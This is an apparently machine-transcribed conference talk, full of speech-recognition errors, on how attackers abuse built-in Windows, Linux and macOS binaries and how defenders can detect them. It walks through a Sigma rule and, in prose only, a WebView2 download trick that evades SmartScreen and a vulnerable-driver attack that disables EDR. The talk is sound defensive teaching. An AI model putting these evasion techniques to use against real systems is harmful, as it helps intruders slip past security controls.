I Make Them Good Processes Go Bad: Deep Dive on LOLbins & GTFObins

good afternoon everyone I know uh after lunch presentations usually are a little bit sluggish um so welcome to I make them good processes go bad I was going to play the audio uh you know I make them good yeah no I'm not going to sing it um I might mess with YouTube filters and stuff so we're gonna Deep dive on walbins and gtf opens um really quick who here knows what a ceyb cya slide is what that stands for okay um if you don't know what it is it's just legal disclaimer stuff I have to say it because I don't want you guys to think that this is any of the positions of my current or

former employers this is all me um this is all my personal opinion I want to tell you guys just like when it comes to hacking don't attempt anything in this presentation without prior authorization especially when it comes to systems you might not own um make sure you vet everything with the proper legal HR management blah blah blah keep your ethics high and don't become what you are defending against I always like to the synopsis slide just in case people have an idea of what this presentation is about and then it really winds up not being it I don't know how many of you guys are fans of the office when Pam winds up in the wrong class and

the teacher's just like nah sit down so that's kind of what I include this slide before is it's you know okay I'm in the wrong presentation well you guys have time to leave now so we're going to talk about wellbins dtfo bins and wall bins does anybody know what an l l o o l bin is yeah this one's pretty new but we're going to be talking about that so a little bit of the history of them um I like to include uh explain like I'm five because I understand that there's going to be different levels of experience with this stuff so I always start off with like an explain like I'm five and then we move on from the

attacker and Defender perspective anything that's commonly abused and then some real world examples and some wrap-ups so a little bit about me I'm an advanced threat Hunter if you really want to know where you can look me up on LinkedIn but I don't like to like advertise it because it's really easy to find out where I work and I like to present as a subject matter expert it just makes things a little bit easier for me from like a legal compliance standpoint stuff I do a lot of research on the side um if you guys meet up with my boyfriend he's here he has to drag me away from computer sometimes because I spend way

too much time on it but I like to do a lot of research and because of that research you guys are going to see a wall bin that has not been disclosed to the laubins project today about a server of 300 people on Discord know about it so you guys are getting a sneak peek about that thanks to research I have some certifications you know like the cisp Azure fund rentals whatever I am in the top one percent of try Hackney and I'm currently on the 600 day streak and if anybody knows how to break streaks please help me because I don't know how to break this without feeling terrible about myself pounds but yeah so a member of infragard

I'm also on the technology Advisory Board of Grand Island I like to box I box out of casels in Niagara Falls if you guys want to actually try like an old school boxing routine come check me out itself I recently did earn my black belt out of there and kickboxing too so don't don't mess with the nerd and then I also do a lot of rocking um and like a corporate liaison for the Kia Memorial Market which is a local charity here that helps veterans in need when it comes to like you know food or assistance and stuff like that so we're getting on to why you're actually here so who knows what a law

bin is

in my area yep do you know what it does or it's a demand already exists generally you know that Badness yeah exactly so the actual definition are executables that are part of an operating system that can be exploited for an attack in my opinion anything could be a love in GTFO been Walden if you try hard enough probably which is what I'm finding with my research anyways so there are a number of different projects that actually track this stuff and we will go through this stuff and my pointer actually is showing up a little bit so while Ben's again it's windows and yep that stands for living off the land binaries like you explained GTFO bins

I was always like kind of concerned on how to like approach this one because I'm sure everybody knows what GTFO stands for and how do I actually say it in a presentation so we're just going to go with GTFO bins and those are Linux binaries and then low bins stands for living off the Orchard binaries and that's a brand new project that involves Mac OS and I've seen quite a few Mac devices around here um so this is a good one to get to know and I will be showing you the website in a little bit so before we get really rolling in it there's a history behind it so living off the land actually came from a

presentation at Derby con did anybody have like the opportunity to go to Derby con before it closed I'm really jealous Derby con was run by trusted set so living off the land first kind of appeared in 2013. uh Christopher Campbell and Matthew Graber at Derby Town 3.0 they were talking about pen testing though so they were talking about as a pen tester how do we get away with some of our attacks and that's where living off the land actually started to churn the masses I guess but for years there were so many different names to it um my favorite name is misplaced trust binaries so that's what people were calling these wall bins before they were

law bins so surrogate programs proxy binaries all that sort of stuff and then as always somebody on Twitter which infosec Twitter if you guys aren't a part of I'm not going to get into the politics of Twitter I have a mastodon I have a lurk or Twitter it's where I find my information so somebody at a point was just like hey can we just come up with a name for these things so we're not all calling it something different and so the best way to do that was a Twitter poll so with 40 no 34 everybody decided on surrogate binaries but as Twitter happens that didn't stick because somebody was like Hey I propose living off the land in binaries because

I like that name and then out of our Mo who had heard that from Philip go was like hey why don't we do living off the land binaries instead of surrogate binaries and if you don't know adver mo he's uh currently works for trusted sec I do believe he is kind of the founder of the projects more or less so he proposed that idea and in Twitter cyber security fashion there was another poll and so this poll eventually put it to rest there was 49 votes and a nice percentage and history was made and unlike many cyber security professionals who go hey this is a really good idea he actually picked it up you know how

many times have you guys in your company go hey we should do this and then nobody implements it because nobody wants to take on the work so Kudos he ran the final poll he spread Walden's far and wide and then he started documenting it in the Walden's project so that's a cool story right but what do you actually mean by executables that are part of an operating system that can be supported in an attack what exactly are they and this is where we get into the explain like I'm five situation because if I can't explain it properly to a five-year-old then I'm not doing my job very well so here to help me explain is everybody's favorite paper clip

clippy wait a minute I don't own the rights to clippy I might get in trouble funniest Clipper to explain um I actually tried a whole bunch of ways to get AI to generate some version of a knockoff clippy for me and it didn't work out very well it was really scary um I'll post a couple of those really creepy examples later on but so here's Clipper to explain yes I made him in Ms paint and it was fun so here's clipper he is very helpful he's built into your operating system he's here to help you with all your needs you can trust him because he was there with the system security knows him and then

unfortunately also this malware knows that he's a thing but if the malware executes then Security will most likely catch on to him so what's malware to do hey Clipper will you help me uh I'm just a normal process and it's not Clippers I like it's not his prerogative to decide what's normal or what's not he's just doing what's being asked of him so he's here to help with all the technical needs so by executing through this legitimate process he kind of avoids detection and I put the asterisks there because there are security tools out there that can detect this sort of stuff so I'm not saying like if you instantly work through allow bins you won't be detected

but security is like huh that's weird but it's Clippers so that's kind of fine um and then the malware is able to execute so I know that was a very very basic idea of it but again I don't know what level we're working with here some people might have never heard of Alden before but the same goes for dtfo bins and all bins it's all the same concept it's just depending on which operating system you're working through so again they have legitimate libraries I included a couple screenshots just like trying to like familiarize with what we might be working with so these programs have legitimate uses like for operating supports so you can't just shut them off instead of packaging

everything together some malware providers like to use these so it makes their malware smaller and it makes it a little bit easier to smuggle in so instead of like hey I'll do a like a fishing campaign you know if they manage to get into a system then they might use something else to call their malware in there's a whole bunch of different ways that you can go about this the lists are quite long now in the projects so it's kind of it's kind of difficult to stay up to date but that's why you know thank you to the adverbose of the world who keep these projects up to date so we're going to clarify what it is

because there's a lot of misconceptions about what actually is a wall then and it's starting to expand a little bit but traditionally it was a signed file or binary native to the operating system or could be downloaded from the official site so what I mean by that is how many of you guys are familiar with like Microsoft Suite where it might have like a PS exec or something like that sometimes I thought natively on operating systems sometimes you have to download that separately and bring it in I know a lot of Corporations who do that they kind of install more of a stripped operating system without all the fancy developer tools and then people download

them later anyways so that was the original intent and then they have to have an unexpected functionality so when you think about that if I do a net use to map a network drive that's what it's used for so that's not all been but if I use like mshta which is used to service HT HTA files but it can also download a remote payload that's considered a login because it's not natively used to download payloads the functionality is also kind of like focused on what threat actors and red teams can use so if it's something that like you know you're not going to see a threat actor use a particular Albin for a reason then it's not technically a law

bed but interesting functions by definition can be executing code different file operations such as read write execute upload download that sort of stuff so we're gonna check out these sites really quick because sometimes it helps to see them rather than me just talk about them so please bear with the transition really quick my mouse fell asleep okay so this is the wild bus project and it's actually going to be kind of difficult for me to navigate from here but so each of these is a binary that you can find on Windows we might just stick with lobbins for now because Windows is most common but when you go in you see all these different functions

so what it can be used for some of them have many functions those are ones you want to be a little bit more careful about and then each of these is also mapped to miter attack so I know a lot of management a lot of compliance groups audit they'd like to see some sort of framework when it comes to this sort of stuff so if we just uh what's one of my favorite ones um let's just go to control.exe so when you go into each of these it gives you a definition of what it is where it can be found different resources from like the researchers on how it's been abused and then there's also these things called detections and

sigma rules sometimes you'll see stuff like elastic it's all just different detections that the blue TV uses to you know and get rid of this stuff so this is the actual Walden's aka the unexpected functionality so it can be used to execute alternative data streams and this here is an example of it so typically if you see something like this in the logs where it's like control.exe you typically see that as a standalone but when it's paired with this sort of like Fast file calling another binary that's what the actual malicious execution of it is so it can be used to evade defenses to hide you know persistent mechanisms and stuff like that thank you

I lost money

all right we're gonna move back this way

so I'll show you gtf opens the same when it comes to Linux binaries we have the same situation where you have the binary that's already built into Linux 7-Zip what it's meant to do and then how you can abuse it here's law bins which is the Mac OS version and this one's relatively brand new so if you guys are like mac users and you're really knowledgeable with the different math binaries consider actually doing research and submitting it to the orchard project because like I said it's brand new thread actors have 10 compromise Max I know everybody likes to think that Mac OS is like super hard and secure nobody can get past it but they're slowly

turning their attention to it so this is again the math project hmm

all right so why do threat actors use them why do red teamers use them well they're kind of stealthy and I mean how many blue teamers out there actually know their environment to a t or know every single binary that exists on a system and on top of all that knows what that binary is supposed to look like in their logs that's kind of a tall ask so they like to use these built-in programs to carry out malicious stuff but take advantage of it by not having to package it in with their code makes it a little bit more lightweight makes it easier to abuse the system more or less and again it makes it harder for security systems

to detect them and on top of it all when it comes to like programs it's really easy like okay we don't want TeamViewer in our environment we'll just block it well you can't exactly block assert util you can't exactly block command like you can't necessarily block all this sort of stuff so they know it's going to be there if they can figure out what sort of operating system you're running tools are already there so it makes it makes it really fun for them and then makes it really terrible for the Defenders so how do they ID and exploit how does a login become a law then research lots and lots and lots of research um

so like I said fingerprinting and operating system gives them a leg up and then all you have to do is kind of like look at the same sites you know they're not just for blue teamers if they look at the website and are like okay well I've never known I didn't know that this binary existed it's right then and there so I like this meme in particular RDP isn't a wall bin but it's sort of the same concept where blue teamers are looking for the bad stuff okay like blue teamers are looking for a Cobalt strike they're looking for you know like a Bitcoin miner they're not looking for RDP necessarily because RDP is used

throughout your environment I mean even if you were like hey let's look up who's already peeing where if you look up like rdpclip.exe the amount of logs you're going to get back are going to be terrible and obviously you can kind of use context if you know your environment well enough like okay maybe a support desk technician should be using RDP but why is this marketing Direct director so again it's not super straightforward when it comes to looking for this sort of stuff but that's a kind of a good meme to like showcase you know why it's so difficult so let's look at an attack really quick um I chose bit admin because it's probably one that you guys should be

aware of so it's command line tool where you can download stuff you can update jobs and when I was first looking for this in our environment I was like okay nobody should be using it it's probably not that common and lo and behold people were using it so what happens typically with a malicious actor is they will come up with some sort of drop file like a bat file or a MK file which downloads another payload and I don't know if you're going to be able to see this text really well but they use bits admin to transfer basically the payload out of this linked file to call a Stager and again like we said with this admin

that's kind of its purpose so this one kind of starts falling into a little bit deeper of a definition of what a Walden actually is so but that's admin traditional software you know you can probably block typical stuff with like a proxy but how many of you guys are blocking like a command shell through your proxy you know you're probably using typical like Chrome or Firefox you have your proxy blocks there but not through command line so bits admin will call the malicious payload it'll download stuff and lo and behold you have a whole bunch of Badness um and typically they'll use some sort of law bin to either call an encryption process which is what happens with

ransomware as there is an encrypt dll which is another already built-in product in like Microsoft but or it could do a whole bunch of other Badness like this one calls an interpreter which if you guys aren't looking for an interpreter if you see something like that that's not analytics environment where you typically intend to see it like you know you're red team using it then uh that's that's another one you want to block so this all sounds terrible for The Blue Team what can we do um Baseline figure out what's normal in your environment there was a lot of wall bins there are a lot of GTFO bins there are a lot of low bins listed on that

website it's going to take a while but what you could do is if you have any sort of Windows process logs if you have an EDR system if you have any of that stuff just stop throwing them in and figure out which ones you never see and if you never see them then just write a detection like hey this should never happen in our environment you're going to hit a lot of work unfortunately like I said there's there's processes that get called all the time there are a lot of executables that get used all the time if you want to you can probably start carving those out bio care developers are allowed to use that our

system Engineers are allowed to use that um it's it's a lot of work but trust me it's worth it in the long run and then if you don't know figure out what the existing features are with a product so like let's just say um X wizard so X wizard has a whole bunch of different products or different features you can run like different flags maybe it's normal to see a whack s or a wax or I'm just making these off the top of my head you'll have to go and look at the official Microsoft documentation and that's my face when I look at the official Microsoft documentation so I'm I apologize right now then and there but so if you see

stuff that's typically normal like okay it typically runs in this fashion it's a scripted job that we can whitelist if it's anything else then that might be bad so this is the official documentation and this is just a screenshot of it and this is just the server bits admin so there is a separate one and I know I probably you guys want me to focus on some GTFO bins and stuff like that I'll get into that but I figure most of you guys are familiar with Windows environments they're kind of the more common corporate environment so that's why I'm sticking with this one for now um so you can compare the official documentation to the Lawless project

like I said if you're familiar with the typical use on the server then go into and figure out okay this stuff isn't typical this stuff isn't what we will see and why do extra work when you don't have to there's already Sigma rules written if you guys have a detection engineering team or anybody who works with your sim team Point them to that that it still might require some tuning but I want to sort of walk through a sigma rule with you guys too so like I said don't reinvent the wheel if you don't have to and this one is going to be really difficult to see so I'm going to kind of try to point my way

through it I'll talk a little bit louder so you guys can see it so this is for a bits admin download um as you can see there's different tags and there's different references you will find on a lot of researchers that will be reoccurring in Sigma Sigma is kind of the detection style that's like that's a vendor agnostic so a lot of people now are writing their rules in Sigma so that way they can put them into some kind of detection as opposed that way if you transition simplenders I know if you guys attended the first presentation contract watching he was talking about the headache of this too is every vendor seems to have their own

provides their data structure and different way of doing detections so a lot of people are now formatting in Sigma as a way to kind of Baseline what's across the industry so blog sources process Creation in Windows a lot of people typically have these kind of Windows logs if we don't then we probably are dealing more with like PDR there are ways to trans people but this one's just process create in Windows so with the detection it's working off of it's an admin as the image so obviously this admin.exe if you see that run okay that's the first condition and then we'll go to suspicious Flags which are if you see a command line with transfer in it okay that's a little

shady you might have a service account that runs the transfer process that might be normal okay you could probably what was the service account that's doing it but that's one suspicious condition other suspicious conditions might be if you see create and add file in the same command line so that's another suspicious flag and then there's an HTTP plug in here too which is obviously okay if you're transferring something from the web that's probable shading so with all these different things there's one more two words copy that's admin.exe so you might actually see somebody copy this particular execute where you see a lot with um different thread actors where they'll copy these legit binaries to a

different location and rename them to try it out and ask what they're doing so if you see copy that's admin too that's another you know okay somebody's trying to hide their activity like I'm like copy puts admin into a different folder and rename it came forward without ESC and then all of a sudden your group teamers are going what's penguin transferring so but after all that there's conditions so like it might be like okay if the first one is if it's admin and this particular flag then over so you don't have to match all of these you can play around with the conditional language and then of course there's different fields that are needed um

these are just a time to help you with your data dictionaries so you might have a main line or you might have processed command line or you might have the parent command line so that's all stuff that you're gonna have to figure out for your environment and then to see whether or not like people I've seen it from the false positives that are not in this environment and what severity level they represented so if you're going to see some rules where they're like hey we didn't see any false positives but you might see false positives if so in this case they've assumed that you don't lose this admin a lot but if you do hey you're going to

see false positives so that's kind of a walk through a sigma if you guys aren't familiar with Sigma I highly recommend checking it out some of like my favorite researchers like chlorine Roth and Mr Knox they all contribute to this and they contribute to the koalas project so it's people who are working with the hey I've identified this as malicious but also here for rules so I I trust these guys a lot all right more on to what the blue teamers can do so I know we talked about like you know detections but that all seems kind of like passive like okay so now we're going to be stuck dealing with a hey an alert went off now we're in firefighting

mode and we have to battle it out so is there anything we can do to actually prevent this sort of stuff so my recommendations are to reduce the chances of an admin level run because a lot of these have to deal with like a lot of these are successful because people have local admin and this is going to make a lot of people mad but your users do not have to be local admin they don't like I know a lot of people say they they have to be a lot of people say they have to be pseudors users they don't and they don't need permissions to write or execute out of system 32 necessarily they might need they

probably need read access read access has to be a thing in system 32 but they don't need higher rights um so like I said try to like restrict those level permissions or even when it comes to service accounts your service account for your application does not need to be domain Advent Esther is clear because there are a couple that legitimately do I have seen quite a few like vulnerability scanners if they don't have domain admin they kind of like you know they don't run properly but a lot of like developers they say their their system their application passed to be domain admin and that's just poor coding so if you can reduce any of that sort of stuff

if you can use like a like a Pam like a credential a higher elevation credential type system I understand that not everybody has the budget in the world to pull that sort of stuff off but these are just little things you can do utilize a layer defense think outside the box so like I said when it came to like hey you might Brock block at the proxy so your users can't go to militia sites you might do a block where like hey they can't go to like a mega.io to download files and stuff like that but also make sure that you're blocking um like Powershell like Powershell shouldn't go that that might bypass your proxy protections so there's always like

a couple ways to get through detections like that a couple ways to get through preventions too so of course you know if you can do that sort of defense and then make sure that users aren't admin and then have antivirus or an EDR on top of it use a layer of Defense if you can regular perform purple team assessments um that's one of my favorite things to do as part of my job is I like to be a blue teamer and then I also like to see like okay well we we just wrote this rule how do I get by it you know I like to I like to play at that angle a lot is

I like to have fun defeating our own defenses so if you can perform purple team activities if you can set the time aside for it really recommend doing it and then of course you know like educate users I mean we all know that users are kind of a thorn in our side but that's part of the business so if you can train them to do like you know regular like fishing activities or understand what's weird um if all of a sudden they see a blip of a black box and like they're like okay well that was kind of weird after I clicked on this link on this website you know like training to recognize that and

definitely don't shame them for reporting we have a really good system in place where we don't punish people for reporting anything that might be weird we'd rather have people be safe rather than sorry and we all know it's going to be a real balance and a real fight between security and business so like I said it's not like you can just block everything as much as we would like to oh wait there's more how many of you guys have heard of wall drivers that's another project that's coming off so uh living off the land drivers it's a project trying to detail malicious drivers I don't know I'll go into a real world example of malicious drivers but

yeah so if you want to check out another project that's coming down the pipeline uh they're tracking anything that has like an outstanding vulnerability there's been a couple high profile attacks that come off of malicious drivers well not even malicious drivers they're just regular drivers that somebody found a way to exploit them so now we're getting to the some of the most commonly abused ones and these are the ones that I think you guys should know obviously it's my opinion some people might think there are better ones and there's couple on here that are I hesitate to call them all bins but other people have called them law bins Powershell is that one so Powershell

it's a command line tool it's a scripting tool it's designed to be a scripting tool it's a system administration tool but it's so heavily abused that people are calling it a Walden I disagree but I'm saying it anyways if you can restrict Powershell users please do if you can restrict people from elevating Powershell command prompts please do I understand Powershell is a lot of uses maybe you don't necessarily have the tools in place to manage your systems without the use of Powershell but make sure you recognize what is normal for Powershell and make sure you recognize which users are using it and what they're using it for but here's a couple other ones mshta is actually becoming a really

popular one because it serves up HTML applications so what a lot of users will see is when they click an HTA file it opens what looks like Microsoft and it looks like it's a website but a lot of times it's actually just up you know it's a disguise so they'll have you click something it'll start downloading a package but that package has already been in there embedded in the HTA file which I know it sounds kind of like convoluted and stuff but that's like a process that's really abused Now by threat actors so if you see lnk to HTA files uh that's definitely a sign that you should probably isolate that system so a couple other ones cert util

obviously if you don't have a means to serve up your certificates or handle them things might get really bad people have used that to download other binaries but said which we talked about run dll 32 is another interesting one I don't know how familiar you guys are with like lower layer dlls but they're basically built-in applications that help other applications run and run dll 32 serves up those dlls so it's all real it gets really convoluted and lower level stuff but this is one where if you see rundale servicing up like an IP address and that's not right if you see it servicing up a whole bunch of different dlls that might not be what

you want to see like if you see like crypt32.dll and stuff that's running a lot unless you have a use for it like you purposely have people who use it to encrypt files and stuff like that you might want to check that sort of stuff out so dtfo bins there was a lot of these too and I figured most people probably aren't super familiar with everything Linux so the ch-mod is at the top not just because it's in alphabetical order but because it's really popular with people chmod can change the permission levels so like let's just say if you are just a lowly level user but you need to have higher elevations to view a file like

somebody with a higher obligation can use chmod to change the file permissions but we see that a lot when it comes to people changing like executable rights and stuff too so if I was a bad guy I might bring in a file called badfile.exe.txt but on a limit system I might need the use chmod to change that to just an executable file to get my malware to run so making it something benign will get it through all the filters but then I'll change it to run my code cront Tab and I don't know if I have time to go through all these but cron tab you see a lot when it comes to scheduling jobs this is a really popular

persistence mechanism so I would check for this and go okay like if it's a normal you know service account where we have a job that runs every night and it's a batch file job for finance okay that's normal but what is this weird job that's running every 10 minutes that's adding a user into the sudoers file or something of that sort that might be a little bit something that uh seems a bit fishy so cron tab's another one curl and W bit which also can be used on Windows and there's a whole bunch of aliases too so you might see it as iwr which is invoke web requests so unfortunately you can rename these files

too but this will be used to pull data so I could use if I'm on my laptop and I use Curl to go to a server I can pull files that way but people can also use that to pull stuff from the internet so if I was like curl GitHub pull a malicious file I can use it that way too so you want to know who's grabbing what with curl or W get um some other ones that are really fun um [ __ ] I know everybody thinks of that as just like a photo editing service but you can do a lot with it including like manipulating like data so that one I thought was fun to mention

and the same with Lua Lua loads and executes school programs but it can be used to execute a whole bunch of other stuff too I gotta speed up a little bit um so well Ben's going in the Mac so um CSR retail which is uh can configure net Boot and authenticated Booth services so you probably don't want any users touching that that's probably one of the flag like I said I don't have a ton of familiarity with Mac but I know a lot of you out there do so you probably can pick up really quick when I'm laying down ditto Pokemon but actual ditto is used to copy files so it's kind of you know another like x

copy or you know you can use that to you know snag files maybe have different permission levels some of my actual playing around with is it preserves the file attributes which is kind of cool um so I think there'll be probably a bit more research on the how to abuse that in the near future NS curl is like curl and W get whoop which we just went over and then tclsh which is their their shell version um so you can load different plugins and Frameworks without actually requiring signed code which is interesting to me because I know apple is typically really secure with their need for signatures um so you can disable the entitlement and then you can load stuff without

actually requiring that sign which is pretty cool but I know uh been really excited to talk about this one so breaking news how many of you guys are familiar with electronics which are like slack and teams and all that sort of stuff okay they're they're all bends now but more importantly Microsoft Edge webview 2 which helps support these apps that's actually what's vulnerable Mr docs actually he's a well-known researcher he submitted teams and Edge to the Robin's project recently if you go on the GitHub you see it pending right now I imagine it'll be public soon but when it came to the actual Ms web View he we were talking about it in the Discord

Channel and there's less than 300 users in this Discord channel so like I said you guys are kind of some of the first to know um it's not a wild known and he hasn't exactly said if he's going to submit this one or not which can be a little bit Shady but basically what web web Edge view does is it helps service up um your apps so your electron apps your CSE and your JavaScript and all that sort of stuff so it's embedded web Technologies but what you can do is you can use it to download stuff so remember my example where I was like Hey malicious file.exe.txt so you can use webview on launch if I was like writing a piece of

malware if it launched Microsoft Edge it'll instantly start a download and if you use a file extension like dot exe.txt it'll get past smart screen which is kind of scary so if I was a bad actor writing a piece of code and I was like okay well we're going to use webview to go and pull a file from my GitHub called badcode.exe.txt and once that's downloaded my malware is going to strip the txt and execute that exe binary now so it's really cool it's really interesting and a lot of apps are starting to use this webview too so you might want to start vetting this sort of stuff you might want to check out right now which of your electron

apps are normal so what you want to look for is like for example if we use teams or if we use slack I want to go in my logs and see what a typical slack launch looks like I want to look and see what a typical teams launch looks like I want to see what a typical webview looks like if you start seeing HTTP requests to sites that you don't typically see such as GitHub or Mega or any of that sort of stuff that's a red flag like I said I don't know how widely used this is researchers have just kind of come across it so okay fun I I want to throw a couple examples of a

couple high profile hacks I know we're running out of time but so there's so many I could think of but I wanted to keep it to date and this just came out a couple weeks ago sizza put out a report for it on vote Thai food which is a chinese-based threat actor and what was interesting about this one is they relied almost exclusively on living off the land techniques and Hands-On keyboard so a lot of like you know cue bots of the world they'll spam the world and they'll use an automated fashion you can pick out those patterns and they don't change them that often but with Hands-On stuff it's a little bit harder to see because everybody's going to use

stuff a little bit differently so they used um run dll 32 which I mentioned they used that to decode and dump LSS and if you don't have the detection on LSS getting dumped and uh that's kind of a problem I know a lot of bdrs will learn on it now but then they used w-min which is another built-in process to remotely create a domain controller install media and then they'll locally dump all that sort of stuff but again you see and t d s util that's another built-in program you see rundale 32 that's a built-in program you can't really block this stuff you just gotta know what's abnormal and I want to mention spy boy because

this is another one and I don't know if I I'd really 100 consider this a wall then but it could be so there was a threat actor recently called spy boy who was recently advertising a tool called Terminator which will turn off get past any antivirus EDR and they listed like crowdstrike and Defender and semantic and all the big ones and they were charging with like 300 to 3 000 so we all probably were like that's not that's not a thing and it wasn't so it's an actual like bring your own bring your own vulnerable driver attack so the only reason I'm mentioning this is because there is the wall drivers now and technically the

zemna anti-malware driver that he brought in could be considered a woven based on if you have that driver already installed so what happens is this driver is already installed there's a POC code for CB 2021 something like that so what that does is he uses that POC code to hook into this legitimate driver which kills off the user processes so again it could be a well bin if you're running this all ready vulnerable driver so you if I don't know if any of you guys are running this but make sure you check that out bring your own vulnerable driver attacks our like like I said legitimate drivers signed with valid certificates but because drivers can run

with kernel level permissions they they can kill off edrs and stuff like that so it's it's legit but not legit it's not a big thing I think you guys should worry about especially if you don't have local admin rights for your users because it has to be run in admin mode and you have to accept the UAC so I I'd imagine seeing this with insiders maybe but so wrapping up too long didn't listen what did we learn understanding the OS architecture is extremely important for understanding leveling off the land sort of techniques whether it's windows or Linux or Mac um disabling critical Services unfortunately as Security Professionals our biggest protection go-to is let's just block it let's just turn it off and

we can't always do that so detection engineering and baselining are your friends support the projects or at least be familiar with them obviously more stars more attractions more people who take an interest in this sort of stuff we're going to find more of wall bins we're going to find more techniques before the bad guys do we're going to develop the detections first and then just like I said always check them for for regular updates so I know I kind of like swirl brain talked really fast um use Simple ocean if you want to add me on LinkedIn you can find me on Discord and you can figure out my username because I've posted a picture

of the same shirt that I'm wearing now I'm sorry for being vague but that's just kind of the paranoid cyber security professional in me so any questions no I don't have a funny joke I didn't drink before this thank you

[Applause]